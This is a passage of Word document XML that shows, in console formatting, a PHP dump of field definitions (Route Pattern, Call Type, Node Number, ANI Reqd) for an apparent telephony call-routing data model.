            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E62804" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6699F6B8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9AE5CF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Route_Pattern</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406EFE6E"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7D239FB1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0003ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AB2526B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0610BC4D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B1478E4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6E8F07" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Route Pattern',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B71F555" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DDD8609" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266BDE0A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; 'route pattern or partition-route-table',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1331E626" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C570256" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3101A8D6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B6DC81" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D3614A2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EC2678B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Call_Type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530AE70F"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644F00B1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0004ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45DA62C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660BB239" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C1174F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 4,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA83367" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Call Type',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62C8BA00" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49948C0F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62CDF12A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A9D0AC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>intl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB705FD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            2 =&gt; 'lev0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6D9AE5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            3 =&gt; 'lev1',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79DC10D0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            4 =&gt; 'lev2',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A7E02A9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            5 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pubu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F38D40E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            6 =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unku</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="622BDB93" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479382F9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01146BDE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077ADC39" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F5F2F82" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Node_Number</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AE4111"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2502F92A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8fe0ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1D8317" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3B0A75" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0D0324" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 3,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="273E77B6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Node Number',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22834FDE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="229BCDD1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E33A06B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D9E0C61" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="234DA11C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ANI_Reqd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742A67AA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>ModelField</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D7E350" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'ca38ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3845F6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE0B64D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BE69D5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31EF039F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; 'ANI </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Reqd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396AAC2D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5C03C7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0109C370" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; 'y',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E9B4081" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; 'n',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55068422" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7607E7B0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285034E3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2809BC50" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="188A065B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02229ADE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_tpl_methods</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049BE6E8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BF604DC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        0 =&gt; 'label',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58254DB1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        1 =&gt; 'input',</w:t>
            </w:r>
          </w:p>
